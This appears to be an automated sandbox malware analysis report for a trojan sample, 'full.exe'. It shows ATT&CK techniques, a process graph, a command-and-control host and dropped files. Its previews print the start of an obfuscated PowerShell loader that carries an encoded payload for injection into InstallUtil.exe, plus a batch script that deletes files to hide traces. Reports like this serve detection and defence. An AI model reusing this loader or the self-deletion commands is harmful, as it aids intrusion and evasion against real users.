                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\full.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid Accounts21
                Windows Management Instrumentation
                1
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                OS Credential Dumping1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                211
                Process Injection
                1
                Obfuscated Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                11
                Registry Run Keys / Startup Folder
                11
                Registry Run Keys / Startup Folder
                1
                Install Root Certificate
                Security Account Manager1
                Query Registry
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Software Packing
                NTDS11
                Security Software Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets1
                Process Discovery
                SSHKeylogging113
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials41
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture1
                Proxy
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Modify Registry
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                Remote System Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                Process Injection
                /etc/passwd and /etc/shadow11
                System Network Configuration Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Hidden Files and Directories
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573924 Sample: full.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 43 1.tcp.sa.ngrok.io 2->43 45 ipwho.is 2->45 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 9 other signatures 2->57 10 full.exe 2 2->10         started        signatures3 process4 file5 41 C:\Users\user\AppData\Local\Temp\Adobe.ps1, Unicode 10->41 dropped 61 Installs new ROOT certificates 10->61 63 Found Tor onion address 10->63 65 Bypasses PowerShell execution policy 10->65 14 powershell.exe 7 10->14         started        17 reg.exe 1 1 10->17         started        19 conhost.exe 10->19         started        signatures6 process7 signatures8 67 Writes to foreign memory regions 14->67 69 Injects a PE file into a foreign processes 14->69 21 InstallUtil.exe 15 5 14->21         started        26 InstallUtil.exe 14->26         started        28 InstallUtil.exe 14->28         started        71 Creates autostart registry keys with suspicious values (likely registry only malware) 17->71 process9 dnsIp10 47 1.tcp.sa.ngrok.io 18.231.236.52, 20545, 49709 AMAZON-02US United States 21->47 49 ipwho.is 108.181.61.49, 443, 49711 ASN852CA Canada 21->49 39 C:\Users\user\AppData\...\aVqnxsyILS0b.bat, DOS 21->39 dropped 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->59 30 cmd.exe 1 21->30         started        file11 signatures12 process13 signatures14 73 Uses ping.exe to sleep 30->73 75 Uses ping.exe to check the status of other devices and networks 30->75 33 conhost.exe 30->33         started        35 PING.EXE 1 30->35         started        37 chcp.com 1 30->37         started        process15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                full.exe5%ReversingLabsWin64.Malware.Generic
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat100%AviraBAT/Delbat.C
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://groups.flytap.comtls:0%Avira URL Cloudsafe
                http://192.95.0.175:3003/loginhttp:0%Avira URL Cloudsafe
                https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UI0%Avira URL Cloudsafe
                1.tcp.sa.ngrok.io0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ipwho.is
                108.181.61.49
                truefalse
                  high
                  1.tcp.sa.ngrok.io
                  18.231.236.52
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://ipwho.is/false
                      high
                      1.tcp.sa.ngrok.iotrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://html4/loose.dtdfull.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpfalse
                        high
                        https://groups.flytap.com/FlyGroups_UI/Entry.aspx?OriginalURL=https://groups.flytap.com/FlyGroups_UIfull.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://192.95.0.175:3003/loginhttp:full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://.cssfull.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpfalse
                          high
                          http://.jpgfull.exe, 00000000.00000000.1450796283.0000000000C04000.00000008.00000001.01000000.00000003.sdmp, full.exe, 00000000.00000002.2092467323.0000000000C10000.00000008.00000001.01000000.00000003.sdmpfalse
                            high
                            https://groups.flytap.comtls:full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            108.181.61.49
                            ipwho.isCanada
                            852ASN852CAfalse
                            18.231.236.52
                            1.tcp.sa.ngrok.ioUnited States
                            16509AMAZON-02UStrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1573924
                            Start date and time:2024-12-12 18:02:04 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 42s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:15
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:full.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@20/11@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 18
                            • Number of non-executed functions: 2
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 172.217.17.74, 172.217.19.10, 172.217.21.42, 142.250.181.138, 172.217.19.170, 172.217.19.234, 142.250.181.106, 142.250.181.74, 172.217.17.42, 172.217.19.202, 2.22.50.144, 2.22.50.131, 52.149.20.212
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • VT rate limit hit for: full.exe
                            TimeTypeDescription
                            12:03:41API Interceptor2x Sleep call for process: InstallUtil.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            108.181.61.49Cracker.exeGet hashmaliciousLuca StealerBrowse
                            • /?output=json
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            1.tcp.sa.ngrok.iofile.exeGet hashmaliciousNjratBrowse
                            • 18.229.146.63
                            bQ0v.exeGet hashmaliciousNjratBrowse
                            • 18.231.93.153
                            bQ0x.exeGet hashmaliciousNjratBrowse
                            • 18.231.93.153
                            uMzkM1DVFy.exeGet hashmaliciousnjRatBrowse
                            • 18.229.146.63
                            ipwho.ishttps://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                            • 108.181.61.49
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                            • 103.126.138.87
                            TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                            • 103.126.138.87
                            http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                            • 103.126.138.87
                            file.exeGet hashmaliciousQuasarBrowse
                            • 103.126.138.87
                            file.exeGet hashmaliciousQuasarBrowse
                            • 103.126.138.87
                            ugjigghFzZ.exeGet hashmaliciousQuasarBrowse
                            • 103.126.138.87
                            http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                            • 103.126.138.87
                            http://womenluxuryfashion.comGet hashmaliciousTechSupportScamBrowse
                            • 103.126.138.87
                            http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                            • 103.126.138.87
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ASN852CAjew.sh4.elfGet hashmaliciousUnknownBrowse
                            • 75.158.230.151
                            mpsl.elfGet hashmaliciousMiraiBrowse
                            • 198.166.177.229
                            mips.elfGet hashmaliciousMiraiBrowse
                            • 142.41.252.248
                            https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                            • 108.181.61.49
                            PO2412010.exeGet hashmaliciousFormBookBrowse
                            • 108.181.189.7
                            rebirth.x86.elfGet hashmaliciousMirai, OkiruBrowse
                            • 206.116.110.1
                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                            • 108.181.135.156
                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                            • 142.82.198.6
                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                            • 173.180.89.128
                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                            • 142.241.53.168
                            AMAZON-02USfIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                            • 185.166.143.50
                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.49
                            4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.49
                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.49
                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                            • 185.166.143.48
                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                            • 185.166.143.48
                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                            • 54.231.193.17
                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                            • 185.166.143.49
                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.48
                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                            • 185.166.143.50
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0efIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                            • 108.181.61.49
                            hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                            • 108.181.61.49
                            4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                            • 108.181.61.49
                            fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                            • 108.181.61.49
                            3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                            • 108.181.61.49
                            ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                            • 108.181.61.49
                            pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                            • 108.181.61.49
                            hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                            • 108.181.61.49
                            x4fDy1muYs.exeGet hashmaliciousUnknownBrowse
                            • 108.181.61.49
                            ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                            • 108.181.61.49
                            No context
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                            Category:dropped
                            Size (bytes):71954
                            Entropy (8bit):7.996617769952133
                            Encrypted:true
                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                            Malicious:false
                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):328
                            Entropy (8bit):3.144086598890895
                            Encrypted:false
                            SSDEEP:6:kK7XL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uDnLNkPlE99SNxAhUe/3
                            MD5:30226766F4B3D0E00922EA78F3559554
                            SHA1:A0F8C30A0DF507DF64CB99227BE34CB2D3D2887F
                            SHA-256:274380D6D327EA13D303CAFE3C04C476E8246FCE004FA72F1F4B84F9EC681E66
                            SHA-512:014F56D29B4B93EAEA90AE0E956B86BB275A8CBBDE8E2291CAF8E5C68B29BC905AE1D2C72DE81CD403227DE84C220C12146405A9B85381E744488F4492C2F7FD
                            Malicious:false
                            Preview:p...... .........4..L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):2047
                            Entropy (8bit):5.338128919349986
                            Encrypted:false
                            SSDEEP:48:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HDfHKdHK8JHoHK7HKmTHlHA:iqiqxwCYqh3oPtI6eqzxTqdqCIq7qqFg
                            MD5:4E0B9E4D3B18975CDC8448466E02A33B
                            SHA1:DC5E5E328B7436E260A3DEB28DE5DCCC9FEEAD0C
                            SHA-256:75C541E0691D37BEE4685FA87C1C3668C4F7CB0396F9A5AE5C4627071952CA62
                            SHA-512:E1D4FEF5454EB71DD01B80BF234A1977E6E085552CE93FA7D88B623CFA984AD907A9BA9EFE7280FB690FC77DC0826EC68EC10D838D80AC2FBB37AC881E6F043A
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.773832331134527
                            Encrypted:false
                            SSDEEP:3:Nlllulx/:NllU
                            MD5:5D9E8D01DBFF846EFCDF95444160A4E2
                            SHA1:4C6B258F023994108CD7092D2C75B151F7DAD729
                            SHA-256:615EFFEF67C8EAB7B3A76867C498863A4731568BE643E26F560E3F1E0494669B
                            SHA-512:1B9C8CA94519FC216467B84DA9C78ED98E8ED4ADD5AD8AFAE56641FF849F449A960F9134640F86E93E10B52A418BB367A1ACEEDB5F94BECBB4E4BADC01B076B8
                            Malicious:false
                            Preview:@...e...................................R.......................
                            Process:C:\Users\user\Desktop\full.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (36038), with CRLF line terminators
                            Category:dropped
                            Size (bytes):11162050
                            Entropy (8bit):3.9082779636087626
                            Encrypted:false
                            SSDEEP:24576:AORR6jvaNQwuWdp9eU1vJfZfjwhIdGunHW5IHiMvE5A3r2OL2hHd/Mi1MYCIRwtf:em5tj4FMYHkDOE7xGaX
                            MD5:90A005927B1D759D4DD93E4721A93585
                            SHA1:30C42C6BCCCC8CE4EFD56AE8D7A88BF15023E60B
                            SHA-256:590F970E72E38B034ECCB2839F763954258D6BF237AA087F31FF4F3951E07D15
                            SHA-512:CC9F478E9111D5A9B55041A9689232DE2F3F6C7299EECE438AEF3CBD3D5D62441CF658F3E36C7401BF21B60F8670F03A695EF5A08B6D6945FE4BCB38A6BE4AEA
                            Malicious:true
                            Preview:$dadqdqwdwqdfqfqpoiu = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'InstallUtil.exe';....$dadadqwdq = '.:.';..$dasdafqqeq = 'A';....$ummtu = 'TVqQ.:..:.M.:..:..:..:.E.:..:..:..:.//8.:..:.Lg.:..:..:..:..:..:..:..:..:.Q.:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.g.:..:..:..:..:.4fug4.:.t.:.nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ.:..:..:..:..:..:..:..:..:.BQRQ.:..:.T.:.ED.:.CsS.:.P0.:..:..:..:..:..:..:..:..:..:.O.:..:.DiEL.:.V.:..:..:.JI.
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):223
                            Entropy (8bit):5.424540011871844
                            Encrypted:false
                            SSDEEP:6:hC47bxrBeLuVFOOzCZGkLW6qRndLvKOZG1qLTwi23fM2sH:d5r+uVEOW8tBdwZk2sH
                            MD5:CA31C79765AFCA2DF4ACF19FD199229E
                            SHA1:60A94A24F2F95962F44820A88A3D20F9C74A6166
                            SHA-256:43FC532DBB01B04BA9F2C8617233D203D1CD0CAFC0089972E14E09503C8EC838
                            SHA-512:7EF7CEB3A87BAD49B3E2C7E84F68C3D972403C72A2C96F6A7B2C3C440445A342331A6B5A73D380F318F8DE8F348A6318A3FB3DC168B876C9A04DBC2383FE94A2
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:@echo off..chcp 65001..echo DONT CLOSE THIS WINDOW!..ping -n 10 localhost > nul..del /a /q /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat"
                            Process:C:\Users\user\Desktop\full.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):464
                            Entropy (8bit):5.127373603808216
                            Encrypted:false
                            SSDEEP:12:cfygzgypRmYPZkoQLSZoKE0abtJo6oTF6dyufibtJx0LqbtJxg6Bv:uz5eSkYF2yQRP6Bv
                            MD5:56E3D6FC991A4D6902ECA1BECD728242
                            SHA1:DA7C478FA5ACDC18477AC0239B9FD2665B3A5D2D
                            SHA-256:7652881B614D8E1F546631BB6EE297C7F9102CB7F81C3EFF66ECEE3A077DBCE5
                            SHA-512:AC65D20F983106CBB8DDABBA28D48E556B5325FEE351AC43342703379D9BD43E4DB267C0746F77DBA3E9F3A6142DA53DDEDB5F2F7125EB3722A6921C976C6BF0
                            Malicious:false
                            Preview:panic: runtime error: invalid memory address or nil pointer dereference.[signal 0xc0000005 code=0x0 addr=0x8 pc=0x48e183]..goroutine 1 [running]:.tap/services.ExecuteCheck({0xc00001e140?, 0x1baccd?})..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/services/hwidController.go:157 +0x63.main.startChecker()..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/main.go:558 +0x11c.main.main()..C:/Users/Mister/Documents/Dev/Checkers/Tap - Golang/main.go:610 +0xf.
                            Process:C:\Windows\SysWOW64\PING.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):502
